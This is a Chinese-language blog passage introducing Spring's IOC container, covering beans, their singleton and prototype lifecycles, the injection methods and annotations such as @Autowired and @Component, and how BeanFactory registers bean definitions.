通过这句话我们能看出来,bean实际上就是被Spring IOC容器实例化、组装、管理的对象。也就是说,创建并且管理对象的事儿不用我们去管了,这些都交由Spring框架的IOC容器去管理,这也就是控制反转的思想,而bean就是我们注入的对象。而bean什么时候去实例化将不会再写死在程序中,也就是我们不需要将对象实例化,只需要用的时候去拿就行了,这种方式不仅让我们不用再花心思管理对象,而且也能避免我们自己一些错误的实例化对象导致的内存问题。

Bean的生命周期

  • 单例:当容器创建时创建对象,伴随容器一直处于生存状态,当容器被销毁时对象才被销毁
  • 多例:当对象被使用时创建新的对象,伴随对象的使用一直处于生存状态,当对象在一定时间内不被使用时被GC回收掉

注入Bean的方式

  • 构造函数注入:默认为无参构造,若为无参构造方式注入则需要类中必须存在有效的无参构造函数,不然会报异常
  • Setter 方法注入:通过类中的Setter方法注入实例化对象
  • 字段注入:通过字段名称直接给字段注入值,也可以直接注入Bean,此两个Bean为引用关系

注入相关注解

  • @Autowired:按照类型自动装配对象,如果一个类型对应多个对象则可使用@Qualifier,@Qualifier的作用就是可以通过名称自动装配
  • @Resource:该注解先通过名称进行装配,若没有声明name则根据类的类型进行装配,顺序与@Autowired相反
  • @Bean:主要用在@Configuration注解的类里,也可以用在@Component注解的类里,我们通过查看@Bean的元注解可以看到,他只能作用在其他注解或者类的方法上,Bean默认的名称为方法名,也可自定义名称与别名
  • @Component:用于标记类为Spring管理的组件的一种方式,通过该注解可以将普通的java类变成IOC容器中的一个Bean。该注解是一个泛型注解,可以用于标记任何类型的组件,他有几个常用的、用于不同场景的子注解例如:@Repository,@Service,@Controller等

BeanFactory

BeanFactory是Spring IOC的本质,他的存在解决了bean的生产于管理,并且Spring还将bean的各个生命周期阶段的管理接口暴露给我们,我们只需要实现这些接口那么在bean的生命周期阶段中,spring就会调用我们的接口实现去对bean做出相应处理。

Spring通过BeanDefinitionReader通过扫描我们项目中使用了@Component或者@Configuration注解的类,获取到BeanDefintiions,将他们注册到BeanFactory中。BeanFactory通过conCurrentHashMap存储bean的信息,key即为bean的名称,Value就是BeanDefintiions,BeanDefintiions就是Bean的一些元数据,比如类名、是否抽象等定义。

实现BeanFactory的实现类有多种,具体细节与取舍可以参考源码或者官方文档查看

总结

到这里我们其实对Spring IOC已经有了一个自己的理解,其实就是我们把类通过不同的方式注入到容器中,我们代码中只需要拿到这个bean然后去用就可以了,至于对象的生命周期都交给了我们的IOC容器去管理。

感谢各位大佬的光临,Spring IOC的细节有很多,每一个点都可以拿出来单独写一篇博客了,因此此篇博客以较为精简的介绍为主,想要探究更深层次的细节可以通过结合官方文档的介绍与源码去理解,好了不说废话了,再次感谢各位大佬能看到这里,如果该文章由任何问题欢迎各位大佬指出,谢谢